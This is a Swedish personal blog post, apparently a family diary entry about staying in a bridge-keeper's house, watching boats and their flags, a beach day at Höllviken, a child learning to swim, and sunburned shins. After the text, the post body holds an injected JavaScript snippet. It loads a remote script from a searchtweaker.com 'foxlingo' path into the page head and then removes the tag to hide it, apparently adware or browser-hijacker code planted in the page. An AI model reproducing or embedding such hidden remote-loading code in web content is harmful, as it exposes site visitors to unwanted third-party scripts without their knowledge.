Livet hos Hogengård

Brovaktarhuset och brända ben

Häftig utsikt åt flera håll här i huset. 
Broöppning nästan varje timma. Mycket intressant. Vi kollar flaggorna på båtarna och ser vilka länder de kommer från. 
Det blev stranden i Höllviken idag. Buset har bestämt sig för att lära sig simma. Han är flitig men det tar nog ett tag innan han får ihop det. 🙂 Att det var ruskans kallt i vattnet brydde han sig mindre om. Friskus! 
Själv har jag haft skjorta på mig mesta delen av dagen. Men. Jag har lyckats bränna mina skenben. Aj aj många fula ord…
Jag plockade av mig klockan på stranden. Syns att jag mest är i solen när jag rider. Bonnabränna och vita händer efter handskarna.

(function(){try{var header=document.getElementsByTagName(”HEAD”)[0];var script=document.createElement(”SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Related Posts

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

The reCAPTCHA verification period has expired. Please reload the page.